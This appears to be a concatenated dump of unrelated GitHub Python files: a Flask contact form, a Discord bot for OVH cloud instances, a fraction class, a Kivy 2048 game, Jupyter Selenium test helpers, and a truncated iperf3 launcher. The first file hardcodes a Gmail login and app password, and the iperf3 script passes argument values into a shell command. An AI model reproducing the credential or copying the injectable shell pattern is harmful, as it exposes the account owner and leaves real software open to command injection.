smtplib.SMTP('smtp.gmail.com',587)\ns.starttls()\ns.login('madanlal885522@gmail.com','hYfkC4NvaG58r8bfPX71')\n\n\nclass contact(db.Model):\n\n name = db.Column(db.String,nullable=False)\n email = db.Column(db.String,nullable=False)\n time = db.Column(db.Time,nullable=False)\n date = db.Column(db.Date,nullable=False)\n mobile = db.Column(db.Integer,nullable=False)\n messege = db.Column(db.String,nullable=False)\n serial_no = db.Column(db.Integer, primary_key=True)\n\n\n@app.route('/',methods=['GET','POST'])\ndef index():\n if (request.method == 'POST'):\n name=request.form.get('name')\n email=request.form.get('email')\n date = request.form.get('date')\n time=request.form.get('time')\n mobile=request.form.get('mobile')\n messege=request.form.get('messege')\n\n entry = contact(name=name,email=email,date=date,time=time,mobile=mobile,messege=messege)\n db.session.add(entry)\n db.session.commit()\n\n\n s.sendmail(email,'madanlal885522@gmail.com','new msg from '+name+'\\nemail: '+email+'\\nmobile: '+mobile+'\\nmessege: '+messege+'\\ndate :'+date+'\\ntime :'+time)\n\n redirect('/')\n\n\n return render_template(\"index.html\")\n\n\napp.run(debug=True)","repo_name":"madannikalje/flask_projects","sub_path":"project1/core/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"23427711625","text":"\"\"\"\nDiscord command definition for /{DISCORD_GROUP_PCI} instance\n\"\"\"\nimport json\n\nimport discord\n\nfrom discord.commands import option\nfrom discord.ext import commands\nfrom loguru import logger\nfrom tabulate import tabulate\n\nfrom variables import (\n DISCORD_GROUP_PCI,\n ROLE_TECH_RO,\n ROLE_TECH_RW,\n)\n\nfrom ._autocomplete import (\n get_instance_list,\n get_project_list,\n get_sshkey_list,\n)\nfrom ._views import InstanceCreationView\n\ndef instance(group_pci, ovh_client, my_nic):\n \"\"\"\n Discord command definition for /{DISCORD_GROUP_PCI} instance\n \"\"\"\n @group_pci.command(\n description='Commands related to Project Instances',\n default_permission=False,\n name='instance',\n )\n @commands.has_any_role(ROLE_TECH_RO)\n @option(\n \"action\",\n description=\"Instances action\",\n autocomplete=discord.utils.basic_autocomplete(\n [\n discord.OptionChoice(\"delete\", value=\"delete\"),\n discord.OptionChoice(\"list\", value=\"list\"),\n discord.OptionChoice(\"show\", value=\"show\"),\n discord.OptionChoice(\"create\", value=\"create\"),\n ]\n )\n )\n @option(\n \"projectid\",\n description=\"Project ID\",\n autocomplete=get_project_list,\n required=True,\n )\n @option(\n \"instanceid\",\n description=\"Instance ID\",\n autocomplete=get_instance_list,\n required=False,\n )\n @option(\n \"sshkeyid\",\n description=\"SSH Key ID\",\n autocomplete=get_sshkey_list,\n required=False,\n )\n async def instance(\n ctx,\n action: str,\n projectid: str,\n instanceid: str,\n sshkeyid: str,\n ):\n \"\"\"\n This part performs actions on Public Cloud Instances\n So far:\n - list: Displays the list of ALL Instances\n - show: Displays the details of a specific Instance\n - delete: Deletes a specific Instance\n - create: Creates a new Instance\n \"\"\"\n # As we rely on potentially a lot of API calls, we need time to answer\n await ctx.defer()\n # Pre-flight checks\n if ctx.channel.type is discord.ChannelType.private:\n channel = ctx.channel.type\n else:\n channel = ctx.channel.name\n name = ctx.author.name\n logger.info(\n f'[#{channel}][{name}] /{DISCORD_GROUP_PCI} instance '\n f'{action} {projectid} {instanceid}'\n )\n\n if action == 'list':\n # This command will require basic TECH_RO role, checked before\n try:\n embed = discord.Embed(\n title=f'**{my_nic}**',\n colour=discord.Colour.green()\n )\n # We start with the headers\n embed_field_value_table = {\n 'Instance Name': [],\n 'Region': [],\n 'Flavor': [],\n }\n\n project = ovh_client.get(f'/cloud/project/{projectid}')\n if project['status'] == 'suspended':\n # Suspended Projects cannot be queried later\n embed.add_field(\n name=f'Project ID: **{projectid}**',\n value='(Suspended)',\n inline=False,\n )\n\n instances = ovh_client.get(\n f'/cloud/project/{projectid}/instance'\n )\n if len(instances) == 0:\n # There is no Instances in the Project\n embed.add_field(\n name=f'Project ID: **{projectid}**',\n value='No Instances',\n inline=False,\n )\n await ctx.interaction.edit_original_response(\n embed=embed\n )\n return\n\n # We loop over the instances to grab their names\n for instance in instances:\n if 'nodepool' in instance['name']:\n # We want to exclude K8s nodepool nodes\n # Too much trouble if someone mistakenly kills one\n continue\n\n embed_field_value_table['Instance Name'].append(instance['name'])\n embed_field_value_table['Region'].append(instance['region'])\n embed_field_value_table['Flavor'].append(instance['planCode'].split('.')[0])\n\n embed.add_field(\n name=f'Project ID: **{projectid}**',\n value=(\n '```' +\n tabulate(\n embed_field_value_table,\n headers='keys',\n tablefmt='pretty',\n stralign='right',\n ) +\n '```'\n ),\n inline=False,\n )\n\n await ctx.interaction.edit_original_response(\n embed=embed\n )\n\n except Exception as e:\n msg = f'API calls KO [{e}]'\n logger.error(msg)\n embed = discord.Embed(\n description=msg,\n colour=discord.Colour.red()\n )\n await ctx.respond(embed=embed)\n return\n else:\n logger.debug(f'[#{channel}][{name}] └──> Queries OK')\n return\n elif action == 'show':\n # This command will require basic TECH_RO role, checked before\n if projectid is None or instanceid is None:\n logger.error('Missing mandatory option(s)')\n msg = (\n 'Check that you provided all variables: \\n'\n ' - `projectid` \\n'\n ' - `instanceid` \\n'\n )\n embed = discord.Embed(\n description=msg,\n colour=discord.Colour.red()\n )\n await ctx.respond(embed=embed)\n return\n\n try:\n instance = ovh_client.get(\n f'/cloud/project/{projectid}/instance/{instanceid}'\n )\n except Exception as e:\n msg = f'API calls KO [{e}]'\n logger.error(msg)\n embed = discord.Embed(\n description=msg,\n colour=discord.Colour.red()\n )\n await ctx.respond(embed=embed)\n return\n else:\n embed = discord.Embed(\n description=(\n f'```json\\n'\n f'{json.dumps(instance, indent=4)}'\n f'\\n```'\n ),\n colour=discord.Colour.green()\n )\n await ctx.respond(embed=embed)\n\n logger.debug(f'[#{channel}][{name}] └──> Queries OK')\n return\n elif action == 'delete':\n # Here for this one, we need more elevated role - TECH_RW\n # Pre-flight checks : Roles\n role_rw = discord.utils.get(ctx.author.guild.roles, name=ROLE_TECH_RW)\n if role_rw not in ctx.author.roles:\n msg = (\n f'[#{channel}][{name}] └──> Missing required role (@{ROLE_TECH_RW})'\n )\n logger.warning(msg)\n embed = discord.Embed(\n description=(\n f\"You don't have the role requested for this operation (@{ROLE_TECH_RW})\"\n ),\n colour=discord.Colour.orange()\n )\n await ctx.respond(embed=embed)\n return\n\n if projectid is None or instanceid is None:\n logger.error('Missing mandatory option(s)')\n msg = (\n 'Check that you provided all variables: \\n'\n ' - `projectid` \\n'\n ' - `instanceid` \\n'\n )\n embed = discord.Embed(\n description=msg,\n colour=discord.Colour.red()\n )\n await ctx.respond(embed=embed)\n return\n\n try:\n instance = ovh_client.get(\n f'/cloud/project/{projectid}/instance/{instanceid}'\n )\n ovh_client.delete(\n f'/cloud/project/{projectid}/instance/{instanceid}'\n )\n except Exception as e:\n msg = f'API calls KO [{e}]'\n logger.error(msg)\n embed = discord.Embed(\n description=msg,\n colour=discord.Colour.red()\n )\n await ctx.respond(embed=embed)\n return\n else:\n embed = discord.Embed(\n title=f'**{my_nic}**',\n description=(\n f\"The Public Cloud Instance \"\n f\"`{instance['name']}` in {instance['region']} \"\n f\"was deleted\"\n ),\n colour=discord.Colour.green()\n )\n embed.set_footer(text=f\"Project ID: {projectid}\")\n\n await ctx.respond(embed=embed)\n\n logger.debug(f'[#{channel}][{name}] └──> Queries OK')\n return\n elif action == 'create':\n # Here for this one, we need more elevated role - TECH_RW\n # Pre-flight checks : Roles\n role_rw = discord.utils.get(ctx.author.guild.roles, name=ROLE_TECH_RW)\n if role_rw not in ctx.author.roles:\n msg = (\n f'[#{channel}][{name}] └──> Missing required role (@{ROLE_TECH_RW})'\n )\n logger.warning(msg)\n embed = discord.Embed(\n description=(\n f\"You don't have the role requested for this operation (@{ROLE_TECH_RW})\"\n ),\n colour=discord.Colour.orange()\n )\n await ctx.respond(embed=embed)\n return\n\n if projectid is None or sshkeyid is None:\n logger.error('Missing mandatory option(s)')\n msg = (\n 'Check that you provided all variables: \\n'\n ' - `projectid` \\n'\n ' - `sshkeyid` \\n'\n )\n embed = discord.Embed(\n description=msg,\n colour=discord.Colour.red()\n )\n await ctx.respond(embed=embed)\n return\n\n try:\n await ctx.respond(\n \"Give me some parameters to fullfill this action:\",\n view=InstanceCreationView(ctx, ovh_client, projectid, sshkeyid),\n ephemeral=True,\n )\n except Exception as e:\n msg = f'Command aborted: Instance creation KO [{e}]'\n logger.error(msg)\n embed = discord.Embed(\n description=msg,\n colour=discord.Colour.red()\n )\n await ctx.respond(embed=embed)\n return\n else:\n logger.info('Command successfull: Instance creation OK')\n return\n","repo_name":"RemyAtOVH/imabot","sub_path":"code/subcommands/public_cloud/instance.py","file_name":"instance.py","file_ext":"py","file_size_in_byte":11792,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"23632339840","text":"import string\nimport copy\nimport math\n\nclass AdvNumber:\n def add_to_fraction(self, val, num_or_dom):\n num_or_dom[0] *= val\n\n def __init__(self, val1, val2=1, op=\"uxux\"):\n self.num_numerator = [1]\n self.num_denominator = [1]\n self.var_numerator = []\n self.var_denominator = []\n \n if op == \"uxux\":\n self.num_numerator = [val1]\n self.num_denominator = [val2]\n else:\n if type(val1) == int:\n val1 = AdvNumber(val1)\n if type(val2) == int:\n val2 = AdvNumber(val2)\n self.combine(val1, val2, op)\n\n def get_reciprocal(self, val):\n temp = [copy.copy(val.num_numerator) , copy.copy(val.var_numerator)]\n val.num_numerator = val.num_denominator\n val.var_numerator = val.var_denominator\n val.num_denominator = temp[0]\n val.var_denominator = temp[1]\n return val\n # def __init__(self, num, variable_arr, op_for_each):\n # self.val = str(num) + [i for i in variable_arr]\n\n # def __init__(self, exp1 : AdvNumber, exp2 : AdvNumber, op):\n # self.val = str(exp1) + op + str(exp2)\n\n def combine(self, val1 , val2 , op : string):\n if val1.var_numerator == [] and val1.var_denominator == [] and val2.var_denominator == [] and val2.var_numerator == []:\n if op == \"*\":\n self.add_to_fraction(val1.num_numerator[0] , self.num_numerator)\n self.add_to_fraction(val2.num_numerator[0] , self.num_numerator)\n self.add_to_fraction(val1.num_denominator[0] , self.num_denominator)\n self.add_to_fraction(val2.num_denominator[0] , self.num_denominator) \n elif op == \"/\":\n var2_inverse = self.get_reciprocal(val2)\n self.combine(val1, var2_inverse, \"*\")\n elif op == \"+\":\n lcm = math.lcm(val1.num_denominator[0], val2.num_denominator[0])\n self.add_to_fraction(lcm, self.num_denominator)\n val1_factor = lcm//val1.num_denominator[0]\n val2_factor = lcm//val2.num_denominator[0]\n val1.num_numerator[0] *= val1_factor\n val2.num_numerator[0] *= val2_factor\n self.add_to_fraction(val1.num_numerator[0] + val2.num_numerator[0], self.num_numerator)\n elif op == \"-\":\n val2.num_numerator[0] *= -1\n self.combine(val1, val2, '+')\n\n #\n # if type(val1) is int and type(val2) is int:\n # if op == \"/\":\n # self.add_to_fraction(val1, self.num_numerator)\n # self.add_to_fraction(val2, self.num_denominator)\n # else:\n # result = basicArithmetic(val1, val2, op)\n # self.add_to_fraction(result, self.num_numerator)\n # elif (type(val1) is str and type(val2) is int) or (type(val1) is int and type(val2) is str) :\n # pass\n # elif type(val1) is str and type(val2) is str:\n # pass\n\n\n def __str__(self):\n return(str(self.num_numerator) + \" / \" + str(self.num_denominator))","repo_name":"meherGill/expression-simplifier","sub_path":"AdvNumber.py","file_name":"AdvNumber.py","file_ext":"py","file_size_in_byte":3148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37592358548","text":"from src.objeto import Objeto, Tipo\nfrom src.Vertice import Vertice\nfrom src.constants import BORDER_SIZE\n\nfrom PyQt6 import QtGui\n\n\nclass Ponto(Objeto):\n def __init__(self, nome: str, coordenadas: Vertice) -> None:\n if len(coordenadas.world_coordinates) != 2:\n raise Exception('Para criar um ponto são necessárias duas, e apenas duas, coordenadas.')\n super().__init__(nome, Tipo.PONTO)\n self.coordenadas = coordenadas\n\n def copy_world_to_cpp_coordinates(self):\n self.coordenadas.cpp_coordinates = self.coordenadas.world_coordinates\n\n def translate(self, dx: int, dy: int) -> tuple[int, int]:\n self.coordenadas.world_coordinates = super().translate(self.coordenadas.world_coordinates, dx, dy)\n self.copy_world_to_cpp_coordinates()\n \n def rotate(self, angle, center) -> tuple[int, int]:\n cx, cy = center\n self.translate(-cx, -cy)\n self.coordenadas.world_coordinates = super().rotate(self.coordenadas.world_coordinates, angle)\n self.copy_world_to_cpp_coordinates()\n self.translate(cx, cy)\n \n def should_draw(self, xmin, xmax, ymin, ymax, xw, yw):\n return ((xw > xmin) and (xw < xmax)) and ((yw > ymin) and (yw < ymax))\n\n def draw(self, canvas, container, world_coords, coords):\n bd = BORDER_SIZE\n x, y = coords\n minXvp, maxXvp, minYvp, maxYvp = world_coords\n \n if not self.should_draw(minXvp + bd, maxXvp - bd, minYvp + bd, maxYvp - bd, x, y):\n return\n\n pen = QtGui.QPen(QtGui.QColor(self.cor))\n pen.setWidth(2)\n\n painter = QtGui.QPainter(canvas)\n painter.setPen(pen)\n\n painter.drawPoint(x, y)\n painter.end()\n container.setPixmap(canvas)\n","repo_name":"ricardofachini/trabalho1-transformada-viewport","sub_path":"src/Ponto.py","file_name":"Ponto.py","file_ext":"py","file_size_in_byte":1752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27399703673","text":"#!/usr/bin/env python\n#-*- coding:utf-8 -*-\n\"\"\"\nmodule: lib\n\"\"\"\nimport sys, os\nimport time, logging, json, random, uuid, datetime\nfrom datetime import date\n\nlogging.basicConfig(level=logging.DEBUG,\n format=\"%(asctime)s - %(levelname)s - %(message)s\")\n\n\nclass Clock():\n \"\"\"一个分时器,限制刷新率\n >>> c = Clock(20) # fps\n >>> c.tick(block=False)\n \"\"\"\n def __init__(self, fps):\n self.set_fps(fps)\n\n def set_fps(self, fps):\n self.fps = fps\n self.interval = 1.0/float(fps)\n self.pre = time.time()\n\n def tick(self, block=True):\n \"\"\"\n 检查是否到了时间\n \"\"\"\n mid = time.time() - self.pre\n if mid < self.interval:\n if block:\n time.sleep(self.interval - mid)\n else:\n return\n self.pre = time.time()\n return True\n","repo_name":"halida/snake-challenge","sub_path":"srcs/lib.py","file_name":"lib.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","stars":75,"dataset":"github-code","pt":"52"} +{"seq_id":"24089758201","text":"from django_filters import rest_framework as df\n\nfrom .widgets import ModelFieldSelect2MultiWidget, ModelFieldSelect2Widget\n\n\nclass Select2ChoiceFilterBase:\n def __init__(self, model, field, *args, **kwargs):\n kwargs.update(\n queryset=model.objects.filter(**{f\"{field}__isnull\": False}),\n to_field_name=field,\n widget=self.widget(\n search_fields=[\n f\"{field}__{kwargs.pop('select2_lookup_expr','icontains')}\",\n ]\n ),\n )\n super().__init__(*args, **kwargs)\n\n\nclass Select2ChoiceFilter(Select2ChoiceFilterBase, df.ModelChoiceFilter):\n \"\"\"A subclass of `django_filters.ModelChoiceFilter` that supports\n Select2 querying of possible values.\"\"\"\n\n widget = ModelFieldSelect2Widget\n\n\nclass Select2MultipleChoiceFilter(Select2ChoiceFilterBase, df.ModelMultipleChoiceFilter):\n \"\"\"Same as `Select2ChoiceFilter` but allows selection of multiple values\"\"\"\n\n widget = ModelFieldSelect2MultiWidget\n","repo_name":"Geoluminate/geoluminate","sub_path":"geoluminate/utils/select2/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"69898789925","text":"# -*- coding: utf-8 -*-\n\"\"\"Base TestCase classes for nbextensions tests.\"\"\"\n\nfrom __future__ import (\n absolute_import, division, print_function, unicode_literals,\n)\n\nimport logging\nimport os\nimport sys\nfrom threading import Event, Thread\n\nfrom jupyter_contrib_core.notebook_compat import serverextensions\nfrom jupyter_contrib_core.testing_utils import (\n GlobalMemoryHandler, get_wrapped_logger, wrap_logger_handlers,\n)\nfrom jupyter_contrib_core.testing_utils.jupyter_env import patch_jupyter_dirs\nfrom nose.plugins.skip import SkipTest\nfrom notebook.notebookapp import NotebookApp\nfrom notebook.tests.launchnotebook import NotebookTestBase\nfrom tornado.ioloop import IOLoop\nfrom traitlets.config import Config\nfrom traitlets.traitlets import default\n\ntry:\n from unittest.mock import Mock\nexcept ImportError:\n from mock import Mock # py2\n\nno_selenium = True\ntry:\n from selenium import webdriver\nexcept ImportError:\n pass\nelse:\n no_selenium = False\n from selenium.common.exceptions import TimeoutException\n from selenium.webdriver.common.by import By\n from selenium.webdriver.remote import remote_connection\n from selenium.webdriver.support import expected_conditions as ec\n from selenium.webdriver.support.ui import WebDriverWait\n # don't show selenium debug logs\n remote_connection.LOGGER.setLevel(logging.INFO)\n\n\nclass NoseyNotebookApp(NotebookApp):\n \"\"\"Wrap the regular logging handler(s). For use inside nose tests.\"\"\"\n\n @default('log')\n def _log_default(self):\n \"\"\"wrap loggers for this application.\"\"\"\n return wrap_logger_handlers(NotebookApp._log_default(self))\n\n\nclass NbextensionTestBase(NotebookTestBase):\n \"\"\"\n Base class for nbextensions test case classes.\n\n We override the setup_class method from NotebookTestBase in order to\n install things, and also to set log_level to debug.\n Also split some of the setup_class method into separate methods in order to\n simplify subclassing.\n \"\"\"\n config = Config(NotebookApp={'log_level': logging.DEBUG})\n\n # these are added for notebook < 4.1, where url_prefix wasn't defined.\n # However, due to the fact that the base_url body data attribute in the\n # page template isn't passed through the urlencode jinja2 filter,\n # we can't expect a base_url which would need encoding to work :(\n if not hasattr(NotebookTestBase, 'url_prefix'):\n url_prefix = '/ab/'\n\n @classmethod\n def base_url(cls):\n return 'http://localhost:%i%s' % (cls.port, cls.url_prefix)\n\n _install_user = False\n _install_sys_prefix = False\n\n @classmethod\n def pre_server_setup(cls):\n \"\"\"Setup extensions etc before running the notebook server.\"\"\"\n # added to install things!\n cls.log.info('Enabling jupyter_nbextensions_configurator')\n inst_func = serverextensions.toggle_serverextension_python\n inst_funcname = '.'.join([inst_func.__module__, inst_func.__name__])\n logger = get_wrapped_logger(\n name=inst_funcname, log_level=logging.DEBUG)\n serverextensions.toggle_serverextension_python(\n 'jupyter_nbextensions_configurator', enabled=True, logger=logger,\n user=cls._install_user, sys_prefix=cls._install_sys_prefix)\n\n @classmethod\n def get_server_kwargs(cls, **overrides):\n kwargs = dict(\n port=cls.port,\n port_retries=0,\n open_browser=False,\n runtime_dir=cls.jupyter_dirs['server']['runtime'],\n notebook_dir=cls.jupyter_dirs['server']['notebook'],\n base_url=cls.url_prefix,\n config=cls.config,\n )\n # disable auth-by-default, introduced in notebook PR #1831\n if 'token' in NotebookApp.class_trait_names():\n kwargs['token'] = ''\n kwargs.update(overrides)\n return kwargs\n\n @classmethod\n def start_server_thread(cls, started_event):\n \"\"\"\n Start a notebook server in a separate thread.\n\n The start is signalled using the passed Event instance.\n \"\"\"\n cls.log.info('Starting notebook server app thread')\n app = cls.notebook = NoseyNotebookApp(**cls.get_server_kwargs())\n # don't register signal handler during tests\n app.init_signal = lambda: None\n # start asyncio loop explicitly in notebook thread\n # (tornado 4 starts per-thread loops automatically, asyncio doesn’t)\n if 'asyncio' in sys.modules:\n import asyncio\n asyncio.set_event_loop(asyncio.new_event_loop())\n app.initialize(argv=[])\n loop = IOLoop.current()\n loop.add_callback(started_event.set)\n try:\n app.start()\n finally:\n # set the event, so failure to start doesn't cause a hang\n started_event.set()\n # app.session_manager.close call was added after notebook 4.0\n if hasattr(app.session_manager, 'close'):\n app.session_manager.close()\n\n @classmethod\n def _setup_patches(cls):\n (cls.jupyter_patches, cls.jupyter_dirs,\n remove_jupyter_dirs) = patch_jupyter_dirs()\n # store in a list to avoid confusion over bound/unbound method in pypy\n cls.removal_funcs = [remove_jupyter_dirs]\n try:\n for ptch in cls.jupyter_patches:\n ptch.start()\n\n # patches for items called in NotebookTestBase.teardown_class\n # env_patch needs a start method as well because of a typo in\n # notebook 4.0 which calls it in the teardown_class method\n cls.env_patch = cls.path_patch = Mock(['start', 'stop'])\n cls.home_dir = cls.config_dir = cls.data_dir = Mock(['cleanup'])\n cls.runtime_dir = cls.notebook_dir = Mock(['cleanup'])\n cls.tmp_dir = Mock(['cleanup'])\n except Exception:\n for func in cls.removal_funcs:\n func()\n raise\n\n @classmethod\n def setup_class(cls):\n \"\"\"Install things & setup a notebook server in a separate thread.\"\"\"\n cls.log = get_wrapped_logger(cls.__name__)\n cls._setup_patches()\n cls.pre_server_setup()\n try:\n started = Event()\n cls.notebook_thread = Thread(\n target=cls.start_server_thread, args=[started])\n cls.notebook_thread.start()\n started.wait()\n cls.wait_until_alive()\n except Exception:\n for func in cls.removal_funcs:\n func()\n raise\n\n @classmethod\n def teardown_class(cls):\n try:\n # call superclass to stop notebook server\n super(NbextensionTestBase, cls).teardown_class()\n finally:\n try:\n for ptch in cls.jupyter_patches:\n ptch.stop()\n finally:\n for func in cls.removal_funcs:\n func()\n\n\ndef _skip_if_no_selenium():\n if no_selenium:\n raise SkipTest('Selenium not installed. '\n 'Skipping selenium-based test.')\n if os.environ.get('TRAVIS_OS_NAME') == 'osx':\n raise SkipTest(\"Don't do selenium tests on travis osx\")\n\n\nclass SeleniumNbextensionTestBase(NbextensionTestBase):\n\n # browser logs from selenium aren't very useful currently, but if you want\n # them, you can set the class attribute show_driver_logs to have them\n # output via the GlobalMemoryHandler on test failure\n show_driver_logs = False\n\n @classmethod\n def setup_class(cls):\n cls.init_webdriver()\n cls._failure_occurred = False # flag for logging\n super(SeleniumNbextensionTestBase, cls).setup_class()\n\n @classmethod\n def init_webdriver(cls):\n cls.log = get_wrapped_logger(cls.__name__)\n _skip_if_no_selenium()\n\n if hasattr(cls, 'driver'):\n return cls.driver\n if (os.environ.get('CI') and os.environ.get('TRAVIS') and\n os.environ.get('SAUCE_ACCESS_KEY')):\n cls.log.info(\n 'Running in CI environment. Using Sauce remote webdriver.')\n username = os.environ['SAUCE_USERNAME']\n access_key = os.environ['SAUCE_ACCESS_KEY']\n capabilities = {\n # 'platform': 'Mac OS X 10.9',\n 'platform': 'Linux',\n 'browserName': 'firefox',\n 'version': 'latest',\n 'tags': [os.environ['TOXENV'], 'CI'],\n 'name': cls.__name__\n }\n hub_url = 'http://{}:{}@ondemand.saucelabs.com:80/wd/hub'.format(\n username, access_key)\n if os.environ.get('TRAVIS'):\n # see https://docs.travis-ci.com/user/gui-and-headless-browsers\n # and https://docs.travis-ci.com/user/sauce-connect\n capabilities.update({\n 'tunnel-identifier': os.environ['TRAVIS_JOB_NUMBER'],\n 'build': os.environ['TRAVIS_BUILD_NUMBER'],\n })\n cls.driver = webdriver.Remote(\n desired_capabilities=capabilities, command_executor=hub_url)\n else:\n cls.log.info('Using local webdriver.')\n cls.driver = webdriver.Firefox()\n return cls.driver\n\n def run(self, results):\n \"\"\"Run a given test. Overridden in order to access results.\"\"\"\n # in py2 unittest, run doesn't return the results object, so we need to\n # create one in order to have a reference to it.\n if results is None:\n results = self.defaultTestResult()\n super(SeleniumNbextensionTestBase, self).run(results)\n if results.failures or results.errors:\n self.__class__._failure_occurred = True\n return results\n\n @classmethod\n def _print_logs_on_failure(cls):\n if cls._failure_occurred:\n cls.log.info('\\n'.join([\n '',\n '\\t\\tFailed test!',\n '\\t\\tCaptured logging:',\n ]))\n GlobalMemoryHandler.rotate_buffer(1)\n GlobalMemoryHandler.flush_to_target()\n\n browser_logger = get_wrapped_logger(\n name=cls.__name__ + '.driver', log_level=logging.DEBUG)\n if cls.show_driver_logs:\n cls.log.info('\\n\\t\\tjavascript console logs below...\\n\\n')\n for entry in cls.driver.get_log('browser'):\n level = logging._nameToLevel.get(\n entry['level'], logging.ERROR)\n msg = entry['message'].strip()\n browser_logger.log(level, msg)\n record, target = GlobalMemoryHandler._buffer[-1]\n record.ct = entry['timestamp'] / 1000.\n GlobalMemoryHandler._buffer[-1] = record, target\n GlobalMemoryHandler.flush_to_target()\n\n if (not cls._failure_occurred) or os.environ.get('CI'):\n cls.log.info('closing webdriver')\n cls.driver.quit()\n else:\n cls.log.info('keeping webdriver open')\n\n @classmethod\n def teardown_class(cls):\n cls._print_logs_on_failure()\n super(SeleniumNbextensionTestBase, cls).teardown_class()\n\n @classmethod\n def wait_for_element(cls, presence_cond, message, timeout=5):\n \"\"\"WebDriverWait for an element to appear, fail test on timeout.\"\"\"\n try:\n return WebDriverWait(cls.driver, timeout).until(\n ec.presence_of_element_located(presence_cond))\n except TimeoutException:\n if message:\n raise cls.failureException(message)\n else:\n raise cls.failureException(\n '{}No element matching condition {!r} found in {}s'.format(\n message, presence_cond, timeout))\n\n @classmethod\n def wait_for_selector(cls, css_selector, message='', timeout=5):\n \"\"\"WebDriverWait for a selector to appear, fail test on timeout.\"\"\"\n if message:\n message += '\\n'\n message = '{}No element matching selector {!r} found in {}s'.format(\n message, css_selector, timeout)\n return cls.wait_for_element(\n (By.CSS_SELECTOR, css_selector), message=message, timeout=timeout)\n\n @classmethod\n def wait_for_partial_link_text(cls, link_text, message='', timeout=5):\n \"\"\"WebDriverWait for a link to appear, fail test on timeout.\"\"\"\n if message:\n message += '\\n'\n message = (\n '{}No element matching partial link text '\n '{!r} found in {}s').format(message, link_text, timeout)\n return cls.wait_for_element((By.PARTIAL_LINK_TEXT, link_text),\n message=message, timeout=timeout)\n\n @classmethod\n def wait_for_xpath(cls, xpath, message='', timeout=5):\n \"\"\"WebDriverWait for a selector to appear, fail test on timeout.\"\"\"\n if message:\n message += '\\n'\n message = '{}No element matching xpath {!r} found in {}s'.format(\n message, xpath, timeout)\n return cls.wait_for_element(\n (By.XPATH, xpath), message=message, timeout=timeout)\n","repo_name":"Jupyter-contrib/jupyter_nbextensions_configurator","sub_path":"tests/nbextensions_test_base.py","file_name":"nbextensions_test_base.py","file_ext":"py","file_size_in_byte":13168,"program_lang":"python","lang":"en","doc_type":"code","stars":961,"dataset":"github-code","pt":"52"} +{"seq_id":"28475082280","text":"import random\nimport kivy\n\nfrom kivy.app import App\nfrom kivy.core.window import Window\nfrom kivy.config import Config\nfrom kivy.clock import Clock\nfrom kivy.uix.label import Label\nfrom kivy.uix.gridlayout import GridLayout\nfrom kivy.properties import NumericProperty\n\nConfig.set(\"graphics\", \"width\", 600)\nConfig.set(\"graphics\", \"height\", 600)\n\n\nclass Box(Label):\n\n value = NumericProperty()\n\n def __init__(self, **kwargs):\n self.value = kwargs.pop(\"value\")\n super(Box, self).__init__(**kwargs)\n\n def on_value(self, value, instance):\n pass\n\n\nclass GameSpace(GridLayout):\n\n def __init__(self, **kwargs):\n super(GameSpace, self).__init__(**kwargs)\n\n self._keyboard = Window.request_keyboard(self._keyboard_closed, self)\n self._keyboard.bind(on_key_down=self.on_keyboard_down)\n self._keyboard.bind(on_key_up=self.on_keyboard_up)\n\n grid_coor = [[0 for _ in range(row, row + 4)] for row in range(0, 16, 4)]\n for row in grid_coor:\n for value in row:\n self.add_widget(Box(value=value))\n self.new_box()\n self.new_box()\n\n def new_box(self):\n empty_boxed = []\n for each in self.children:\n if each.value == 0:\n empty_boxed.append(self.children.index(each))\n self.children[random.choices(empty_boxed)[0]].value = 2\n\n def _keyboard_closed(self):\n self._keyboard.unbind(on_key_down=self._on_keyboard_down)\n self._keyboard.unbind(on_key_up=self._on_keyboard_up)\n self._keyboard = None\n\n def get_box(self, row, col):\n return self.children[-row * 4 + 4 - col]\n\n def check_value(self, current_box, next_box):\n print(current_box.value, next_box.value)\n if next_box.value == 0:\n next_box.value = current_box.value\n current_box.value = 0\n # self.new_box()\n return next_box\n elif next_box.value == current_box.value:\n next_box.value = current_box.value * 2\n current_box.value = 0\n # self.new_box()\n return next_box\n\n def on_keyboard_down(self, keyboard, keycode, text, modifiers):\n if keycode[1] == \"up\" or keycode[1] == \"down\":\n for col in range(1, 5):\n if keycode[1] == \"up\":\n for box in range(2, 5):\n current_box = self.get_box(box, col)\n for element in range(box - 1, 0, -1):\n current_box = self.check_value(current_box, self.get_box(element, col))\n if not current_box:\n break\n elif keycode[1] == \"down\":\n for box in range(1, 4):\n current_box = self.get_box(box, col)\n for element in range(box + 1, 5):\n current_box = self.check_value(current_box, self.get_box(element, col))\n if not current_box:\n break\n\n elif keycode[1] == \"left\" or keycode[1] == \"right\":\n for row in range(1, 5):\n if keycode[1] == \"left\":\n for box in range(2, 5):\n current_box = self.get_box(row, box)\n for element in range(box - 1, 0, -1):\n current_box = self.check_value(current_box, self.get_box(row, element))\n if not current_box:\n break\n\n elif keycode[1] == \"right\":\n for box in range(1, 4):\n current_box = self.get_box(row, box)\n for element in range(box + 1, 5):\n current_box = self.check_value(current_box, self.get_box(row, element))\n if not current_box:\n break\n self.new_box()\n\n def on_keyboard_up(self, keyboard, keycode):\n pass\n\n\nclass NumberStackApp(App):\n pass\n\n\nNumberStackApp().run()\n\n","repo_name":"jeffsui1412/2048","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39950977450","text":"#!/usr/bin/python\n\nimport sys\nfrom subprocess import check_output\nfrom subprocess import Popen\n\n# This application used to launch communication between hosts via iperf3 utility\nip_addr = str(sys.argv[1])\nmode = str(sys.argv[2])\nif mode == 'server':\n command = 'iperf3 -s -B ' + ip_addr + ' -i 1 &'\nelse:\n command = 'iperf3 -c ' + ip_addr + ' -u -b 100M -i 1 -t 20 &'\nprocess = Popen(command, shell = True)\np = 